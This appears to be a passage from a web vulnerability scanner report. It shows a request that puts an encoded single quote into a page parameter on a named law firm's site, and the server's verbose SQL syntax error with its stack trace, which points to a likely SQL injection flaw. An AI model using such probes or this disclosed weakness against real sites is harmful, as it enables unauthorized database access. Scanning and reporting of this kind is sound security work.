OiBGcm9tIFNvdXRoIFN0YXRpb24gKGV4aXQgdmlhIHRoZSBtYWluIGVudHJhbmNlIGFuZCBjcm9zcyBBdGxhbnRpYyBBdmVudWUgdG8gRmVkZXJhbCBTdHJlZXQpIHByb2NlZWQgdHdvIGJsb2NrcyBhbmQgdGFrZSBhIHJpZ2h0IG9udG8gRnJhbmtsaW4gU3RyZWV0LiBDb250aW51ZSBvbiBGcmFua2xpbiBTdHJlZXQgZm9yIDMgYmxvY2tzLiAyNjUgRnJhbmtsaW4gaXMgb24gdGhlIGNvcm5lciBvZiBGcmFua2xpbiBhbmQgT2xpdmVyLiBcPC9wXD5cPGJcPg0KXDxwIGFsaWduPWxlZnRcPkdyZWVuIExpbmVcPC9iXD46IEZyb20gR292ZXJubWVudCBDZW50ZXIgU3RhdGlvbiwgZ28gbGVmdCBvbnRvIENvdXJ0IFN0cmVldCB3aGljaCB0dXJucyBpbnRvIFN0YXRlIFN0cmVldCBhdCB0aGUgQ29uZ3Jlc3MgU3RyZWV0IGludGVyc2VjdGlvbi4gTWFrZSBhIHJpZ2h0IGF0IENvbmdyZXNzIFN0cmVldCBhbmQgcHJvY2VlZCAzLTQgYmxvY2tzIHRvIEZyYW5rbGluIFN0cmVldC4gVHVybiBsZWZ0IGF0IEZyYW5rbGluIFN0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8Ylw DQpcPHBcPk9yYW5nZS9CbHVlIExpbmVcPC9iXD46IEZyb20gU3RhdGUgU3RyZWV0IFN0YXRpb24sIHRha2UgYSByaWdodCBvbiBDb25ncmVzcyBTdHJlZXQgYW5kIHByb2NlZWQgdGhyZWUgdG8gZm91ciBibG9ja3MgdG8gRnJhbmtsaW4gU3RyZWV0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8L2Zvb1w DQpcPGRpdlw DQpcPGRpdlw DQpcPHBcPk1jQ2FydGVyICZhbXBcOyBFbmdsaXNoIGlzIGxvY2F0ZWQgYXQgMjY1IEZyYW5rbGluIFN0cmVldC4mbmJzcFw7IE91ciBvZmZpY2VzIGFyZSBvbiB0aGUgMTR0aCBmbG9vci4mbmJzcFw7IFBsZWFzZSBjYWxsIHVzIGF0IDYxNy00NDktNjUwMC4gXDwvcFw DQpcPHBcPlNtYXJUcmF2ZWxlciBcPGJyXD5Gb3IgcmVhbC10aW1lLCByb3V0ZS1zcGVjaWZpYyB0cmFmZmljIHJlcG9ydHMsIFNtYXJUcmF2ZWxlciBjYW4gYWxzbyBiZSByZWFjaGVkIGF0IDYxNy0zNzQtMTIzNC5cPGJyXD5cPC9wXD5cPC9kaXZcPlw8L2Rpdlw Oz4 Oz47Oz47Pj47dDw7bDxpPDE Oz47bDx0PHA8cDxsPFRleHQ7PjtsPEJvc3RvbiBNYWluOz4 Oz47Oz47Pj47Pj47Pj47PhAty6L 8bEAq44RzBhw7T/ELP 0

Request

POST /new/showlocationnew.aspx?show=%2527 HTTP/1.1
Referer: http://www.mccarter.com/new/showlocationnew.aspx?show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Content-Length: 6698
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM%2bOz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA%2bO2k8MT47PjtsPHQ8O2w8aTwzPjs%2bO2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciZuYnNwXDtcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQzMyIgaHR0cDogd3d3Lm1jY2FydGVyLmNvbSB3d3cyIGJpb3NuZXcuYXNweD9TZWFyY2g9J1RydWUmYW1wXDtMb2NhdGlvbj04IidcPiZuYnNwXDtCT1NUT04gT2ZmaWNlIExhd3llcnNcPC9hXD5cPGEgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQiXD5cPC9hXD5cPC9zdHJvbmdcPlw8L3BcPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9wXD5cPGZvbyBmYWNlPUFyaWFsIHNpemU9Mlw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gQm9zdG9uIE9mZmljZSBHYXJhZ2U6XDwvc3Ryb25nXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPHN0cm9uZ1w%2bRnJvbSBwb2ludHMgTm9ydGg6IFw8L3N0cm9uZ1w%2bVGFrZSBSb3V0ZSA5MyBTb3V0aCB0byBleGl0IDI0QS4gRXhpdCAyNEEgaXMgb24gdGhlIHJpZ2h0LCBhYm91dCAmIzE4OFw7IG1pbGUgYWZ0ZXIgeW91IGVudGVyIHRoZSB0dW5uZWwuIFN0YXkgdG8gdGhlIHJpZ2h0IHNpZGUgb2YgdGhlIGV4aXQgcmFtcCB1bnRpbCBleGl0IDI0QSBqb2lucyB0aGUgSkZLIFN1cmZhY2UgUm9hZCBhdCB0aGUgdHJhZmZpYyBsaWdodHMuIFRha2UgYSBsZWZ0IGF0IHRoZSBlbmQgb2YgdGhlIG9mZiByYW1wIChhdCBsaWdodHMpLiBGb2xsb3cgdGhlIFN1cmZhY2UgUm9hZCwga2VlcGluZyBCb3N0b24gSGFyYm9yIGFuZCB0aGUgTWFycmlvdHQtTG9uZyBXaGFyZiBIb3RlbCB0byB5b3VyIGxlZnQuIFRha2UgYSByaWdodCB0dXJuIG9udG8gQnJvYWQgU3RyZWV0LCBqdXN0IGFmdGVyIHBhc3NpbmcgdGhlIEhhcmJvciBQYXJraW5nIEdhcmFnZSBvbiB5b3VyIGxlZnQuIFRha2UgdGhlIDFzdCBsZWZ0LCB3aGljaCBpcyBGcmFua2xpbiBTdHJlZXQuIFByb2NlZWQgc3RyYWlnaHQgZm9yIDMgYmxvY2tzIGFuZCB0YWtlIGEgcmlnaHQgb250byBQZWFybCBTdHJlZXQsIGFuZCBhbiBpbW1lZGlhdGUgbGVmdCBpbnRvIHRoZSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIHBhcmsuIFw8aVw%2bRm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9pXD5cPHN0cm9uZ1w%2bRnJvbSBwb2ludHMgU291dGg6Jm5ic3BcO1w8L3N0cm9uZ1w%2bVGFrZSBSb3V0ZSA5MyBOb3J0aCB0byB0YWtlIGV4aXQgMjMuIFRha2UgYW4gaW1tZWRpYXRlIGxlZnQgb2ZmIHRoZSBleGl0IG9udG8gSm9obiBGLiBGaXR6Z2VyYWxkIFN1cmZhY2UgUmQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMsIGF0IHRoZSBGcmFua2xpbiBTdHJlZXQgaW50ZXJzZWN0aW9uLCB0aGUgZW50cmFuY2UgdG8gdGhlIGdhcmFnZSB3aWxsIGJlIGltbWVkaWF0ZWx5IG9uIHRoZSBsZWZ0LiBcPGVtXD5Gb3Igd2Fsa2luZyBkaXJlY3Rpb25zIGZyb20gdGhlIGdhcmFnZSB0byBvdXIgYnVpbGRpbmcsIHBsZWFzZSBzZWUgYmVsb3cuIFw8L2VtXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9mb29cPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD5cPHN0cm9uZ1w%2bRnJvbSBMb2dhbiBBaXJwb3J0OiBcPC9zdHJvbmdcPkZvbGxvdyB0aGUgQWlycG9ydCBleGl0IHNpZ25zIHRvIEktOTAgV2VzdC9UaGUgVGVkIFdpbGxpYW1zIFR1bm5lbC4gVGFrZSBleGl0IDI1IC0gU291dGggQm9zdG9uLiBUdXJuIGxlZnQgb250byBOb3J0aGVybiBBdmVudWUvU2VhcG9ydCBCb3VsZXZhcmQuIFlvdSB3aWxsIGdvIG92ZXIgdGhlIE1vYWtsZXkgQnJpZGdlLCBhbmQgY29udGludWUgdG8gZm9sbG93IFNlYXBvcnQgQm91bGV2YXJkLiBUdXJuIGxlZnQgb250byBQdXJjaGFzZSBTdHJlZXQuIFR1cm4gcmlnaHQgb250byBQZWFybCBTdHJlZXQuIEFmdGVyIHRoZSBzZWNvbmQgc2V0IG9mIGxpZ2h0cywgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgb24gdGhlIGxlZnQgaGFuZCBzaWRlLiBcPGlcPkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSB0aGUgZ2FyYWdlIHRvIG91ciBidWlsZGluZywgcGxlYXNlIHNlZSBiZWxvdy4gXDwvcFw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDwvaVw%2bXDxzdHJvbmdcPkZyb20gdGhlIE1hc3MgUGlrZTombmJzcFw7XDwvc3Ryb25nXD5Gb2xsb3cgdGhlIE1hc3NhY2h1c2V0dHMgVHVybnBpa2UgKDkwIEVhc3QpIGludG8gQm9zdG9uLiBUYWtlIGV4aXQgMjRCIHRvIEktOTMgTm9ydGggdG8gZXhpdCAyMy4gVGFrZSBhbiBpbW1lZGlhdGUgbGVmdCBvZmYgdGhlIGV4aXQgb250byBKb2huIEYuIEZpdHpnZXJhbGQgU3VyZmFjZSBSZC9TdXJmYWNlIFJvYWQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgaW1tZWRpYXRlbHkgb24gdGhlIGxlZnQuIFw8aVw%2bRm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD5cPC9pXD5cPC9mb29cPg0KXDxwIGFsaWduPWxlZnRcPlw8c3Ryb25nXD4qKkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIDI2NSBGcmFua2xpbiBTdHJlZXQqKlw8L3N0cm9uZ1w%2bXDxpXD5cPGJyXD5cPC9pXD5XaGVuIHlvdSBjb21lIG91dCBvZiB0aGUgR2FyYWdlLCB0dXJuIGxlZnQoc3RheWluZyBvbiBGcmFua2xpbiBTdHJlZXQpYW5kIHByb2NlZWQgdG93YXJkcyB0aGUgTGFuZ2hhbSBIb3RlbC4gV2FsayBzdHJhaWdodCBkb3duIEZyYW5rbGluIFN0cmVldCB0d28gYmxvY2tzIHRvIG91ciBidWlsZGluZyBhdCAyNjUgRnJhbmtsaW4gU3RyZWV0LiBQbGVhc2UgY2hlY2sgaW4gYXQgdGhlIFNlY3VyaXR5IERlc2sgYW5kIHByb2NlZWQgdG8gdGhlIDE0XDxzdXBcPnRoXDwvc3VwXD4gRmxvb3IuIFw8L3BcPlw8Ylw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDwvcFw%2bDQpcPHAgYWxpZ249bGVmdFw%2bTUJUQSAoU3Vid2F5KSBEaXJlY3Rpb25zIFw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlJlZCBMaW5lXDwvYlw%2bOiBGcm9tIFNvdXRoIFN0YXRpb24gKGV4aXQgdmlhIHRoZSBtYWluIGVudHJhbmNlIGFuZCBjcm9zcyBBdGxhbnRpYyBBdmVudWUgdG8gRmVkZXJhbCBTdHJlZXQpIHByb2NlZWQgdHdvIGJsb2NrcyBhbmQgdGFrZSBhIHJpZ2h0IG9udG8gRnJhbmtsaW4gU3RyZWV0LiBDb250aW51ZSBvbiBGcmFua2xpbiBTdHJlZXQgZm9yIDMgYmxvY2tzLiAyNjUgRnJhbmtsaW4gaXMgb24gdGhlIGNvcm5lciBvZiBGcmFua2xpbiBhbmQgT2xpdmVyLiBcPC9wXD5cPGJcPg0KXDxwIGFsaWduPWxlZnRcPkdyZWVuIExpbmVcPC9iXD46IEZyb20gR292ZXJubWVudCBDZW50ZXIgU3RhdGlvbiwgZ28gbGVmdCBvbnRvIENvdXJ0IFN0cmVldCB3aGljaCB0dXJucyBpbnRvIFN0YXRlIFN0cmVldCBhdCB0aGUgQ29uZ3Jlc3MgU3RyZWV0IGludGVyc2VjdGlvbi4gTWFrZSBhIHJpZ2h0IGF0IENvbmdyZXNzIFN0cmVldCBhbmQgcHJvY2VlZCAzLTQgYmxvY2tzIHRvIEZyYW5rbGluIFN0cmVldC4gVHVybiBsZWZ0IGF0IEZyYW5rbGluIFN0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8Ylw%2bDQpcPHBcPk9yYW5nZS9CbHVlIExpbmVcPC9iXD46IEZyb20gU3RhdGUgU3RyZWV0IFN0YXRpb24sIHRha2UgYSByaWdodCBvbiBDb25ncmVzcyBTdHJlZXQgYW5kIHByb2NlZWQgdGhyZWUgdG8gZm91ciBibG9ja3MgdG8gRnJhbmtsaW4gU3RyZWV0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8L2Zvb1w%2bDQpcPGRpdlw%2bDQpcPGRpdlw%2bDQpcPHBcPk1jQ2FydGVyICZhbXBcOyBFbmdsaXNoIGlzIGxvY2F0ZWQgYXQgMjY1IEZyYW5rbGluIFN0cmVldC4mbmJzcFw7IE91ciBvZmZpY2VzIGFyZSBvbiB0aGUgMTR0aCBmbG9vci4mbmJzcFw7IFBsZWFzZSBjYWxsIHVzIGF0IDYxNy00NDktNjUwMC4gXDwvcFw%2bDQpcPHBcPlNtYXJUcmF2ZWxlciBcPGJyXD5Gb3IgcmVhbC10aW1lLCByb3V0ZS1zcGVjaWZpYyB0cmFmZmljIHJlcG9ydHMsIFNtYXJUcmF2ZWxlciBjYW4gYWxzbyBiZSByZWFjaGVkIGF0IDYxNy0zNzQtMTIzNC5cPGJyXD5cPC9wXD5cPC9kaXZcPlw8L2Rpdlw%2bOz4%2bOz47Oz47Pj47dDw7bDxpPDE%2bOz47bDx0PHA8cDxsPFRleHQ7PjtsPEJvc3RvbiBNYWluOz4%2bOz47Oz47Pj47Pj47Pj47PhAty6L%2b8bEAq44RzBhw7T%2fELP%2b0

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 17:43:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4343


<html>
<head>
<title>Incorrect syntax near '27'.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Incorrect syntax near '27'.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Incorrect syntax near '27'.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Incorrect syntax near '27'.]
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream) +742
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior) +45
_SaturnoTools.Library.libData.GetReader(String strSQL) +143
Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Incorrect syntax near '27'.
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream)
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior)
at _SaturnoTools.Library.libData.GetReader(String strSQL)
at Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /new/showlocationnew.aspx

/new/showlocationnew.aspx

http://www.mccarter.com/new/showlocationnew.aspx?PrintPage=True&Show=%2527&sortby=3&by=3&title=3&rel..

Parameters

Parameter Type Value
PrintPage GET True
Show GET %27
sortby GET 3
by GET 3
title GET 3
related GET 3
__VIEWSTATE POST dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM Oz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA O2k8MT47PjtsPHQ8O2w8aTwzPjs O2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciZuYnNwXDtcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQzMyIgaHR0cDogd3d3Lm1jY2FydGVyLmNvbSB3d3cyIGJpb3NuZXcuYXNweD9TZWFyY2g9J1RydWUmYW1wXDtMb2NhdGlvbj04IidcPiZuYnNwXDtCT1NUT04gT2ZmaWNlIExhd3llcnNcPC9hXD5cPGEgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQiXD5cPC9hXD5cPC9zdHJvbmdcPlw8L3BcPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9wXD5cPGZvbyBmYWNlPUFyaWFsIHNpemU9Mlw DQpcPHAgYWxpZ249bGVmdFw XDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gQm9zdG9uIE9mZmljZSBHYXJhZ2U6XDwvc3Ryb25nXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPHN0cm9uZ1w RnJvbSBwb2ludHMgTm9ydGg6IFw8L3N0cm9uZ1w VGFrZSBSb3V0ZSA5MyBTb3V0aCB0byBleGl0IDI0QS4gRXhpdCAyNEEgaXMgb24gdGhlIHJpZ2h0LCBhYm91dCAmIzE4OFw7IG1pbGUgYWZ0ZXIgeW91IGVudGVyIHRoZSB0dW5uZWwuIFN0YXkgdG8gdGhlIHJpZ2h0IHNpZGUgb2YgdGhlIGV4aXQgcmFtcCB1bnRpbCBleGl0IDI0QSBqb2lucyB0aGUgSkZLIFN1cmZhY2UgUm9hZCBhdCB0aGUgdHJhZmZpYyBsaWdodHMuIFRha2UgYSBsZWZ0IGF0IHRoZSBlbmQgb2YgdGhlIG9mZiByYW1wIChhdCBsaWdodHMpLiBGb2xsb3cgdGhlIFN1cmZhY2UgUm9hZCwga2VlcGluZyBCb3N0b24gSGFyYm9yIGFuZCB0aGUgTWFycmlvdHQtTG9uZyBXaGFyZiBIb3RlbCB0byB5b3VyIGxlZnQuIFRha2UgYSByaWdodCB0dXJuIG9udG8gQnJvYWQgU3RyZWV0LCBqdXN0IGFmdGVyIHBhc3NpbmcgdGhlIEhhcmJvciBQYXJraW5nIEdhcmFnZSBvbiB5b3VyIGxlZnQuIFRha2UgdGhlIDFzdCBsZWZ0LCB3aGljaCBpcyBGcmFua2xpbiBTdHJlZXQuIFByb2NlZWQgc3RyYWlnaHQgZm9yIDMgYmxvY2tzIGFuZCB0YWtlIGEgcmlnaHQgb250byBQZWFybCBTdHJlZXQsIGFuZCBhbiBpbW1lZGlhdGUgbGVmdCBpbnRvIHRoZSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIHBhcmsuIFw8aVw Rm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9pXD5cPHN0cm9uZ1w RnJvbSBwb2ludHMgU291dGg6Jm5ic3BcO1w8L3N0cm9uZ1w VGFrZSBSb3V0ZSA5MyBOb3J0aCB0byB0YWtlIGV4aXQgMjMuIFRha2UgYW4gaW1tZWRpYXRlIGxlZnQgb2ZmIHRoZSBleGl0IG9udG8gSm9obiBGLiBGaXR6Z2VyYWxkIFN1cmZhY2UgUmQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMsIGF0IHRoZSBGcmFua2xpbiBTdHJlZXQgaW50ZXJzZWN0aW9uLCB0aGUgZW50cmFuY2UgdG8gdGhlIGdhcmFnZSB3aWxsIGJlIGltbWVkaWF0ZWx5IG9uIHRoZSBsZWZ0LiBcPGVtXD5Gb3Igd2Fsa2luZyBkaXJlY3Rpb25zIGZyb20gdGhlIGdhcmFnZSB0byBvdXIgYnVpbGRpbmcsIHBsZWFzZSBzZWUgYmVsb3cuIFw8L2VtXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9mb29cPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD5cPHN0cm9uZ1w RnJvbSBMb2dhbiBBaXJwb3J0OiBcPC9zdHJvbmdcPkZvbGxvdyB0aGUgQWlycG9ydCBleGl0IHNpZ25zIHRvIEktOTAgV2VzdC9UaGUgVGVkIFdpbGxpYW1zIFR1bm5lbC4gVGFrZSBleGl0IDI1IC0gU291dGggQm9zdG9uLiBUdXJuIGxlZnQgb250byBOb3J0aGVybiBBdmVudWUvU2VhcG9ydCBCb3VsZXZhcmQuIFlvdSB3aWxsIGdvIG92ZXIgdGhlIE1vYWtsZXkgQnJpZGdlLCBhbmQgY29udGludWUgdG8gZm9sbG93IFNlYXBvcnQgQm91bGV2YXJkLiBUdXJuIGxlZnQgb250byBQdXJjaGFzZSBTdHJlZXQuIFR1cm4gcmlnaHQgb250byBQZWFybCBTdHJlZXQuIEFmdGVyIHRoZSBzZWNvbmQgc2V0IG9mIGxpZ2h0cywgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgb24gdGhlIGxlZnQgaGFuZCBzaWRlLiBcPGlcPkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSB0aGUgZ2FyYWdlIHRvIG91ciBidWlsZGluZywgcGxlYXNlIHNlZSBiZWxvdy4gXDwvcFw DQpcPHAgYWxpZ249bGVmdFw XDwvaVw XDxzdHJvbmdcPkZyb20gdGhlIE1hc3MgUGlrZTombmJzcFw7XDwvc3Ryb25nXD5Gb2xsb3cgdGhlIE1hc3NhY2h1c2V0dHMgVHVybnBpa2UgKDkwIEVhc3QpIGludG8gQm9zdG9uLiBUYWtlIGV4aXQgMjRCIHRvIEktOTMgTm9ydGggdG8gZXhpdCAyMy4gVGFrZSBhbiBpbW1lZGlhdGUgbGVmdCBvZmYgdGhlIGV4aXQgb250byBKb2huIEYuIEZpdHpnZXJhbGQgU3VyZmFjZSBSZC9TdXJmYWNlIFJvYWQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgaW1tZWRpYXRlbHkgb24gdGhlIGxlZnQuIFw8aVw Rm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD5cPC9pXD5cPC9mb29cPg0KXDxwIGFsaWduPWxlZnRcPlw8c3Ryb25nXD4qKkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIDI2NSBGcmFua2xpbiBTdHJlZXQqKlw8L3N0cm9uZ1w XDxpXD5cPGJyXD5cPC9pXD5XaGVuIHlvdSBjb21lIG91dCBvZiB0aGUgR2FyYWdlLCB0dXJuIGxlZnQoc3RheWluZyBvbiBGcmFua2xpbiBTdHJlZXQpYW5kIHByb2NlZWQgdG93YXJkcyB0aGUgTGFuZ2hhbSBIb3RlbC4gV2FsayBzdHJhaWdodCBkb3duIEZyYW5rbGluIFN0cmVldCB0d28gYmxvY2tzIHRvIG91ciBidWlsZGluZyBhdCAyNjUgRnJhbmtsaW4gU3RyZWV0LiBQbGVhc2UgY2hlY2sgaW4gYXQgdGhlIFNlY3VyaXR5IERlc2sgYW5kIHByb2NlZWQgdG8gdGhlIDE0XDxzdXBcPnRoXDwvc3VwXD4gRmxvb3IuIFw8L3BcPlw8Ylw 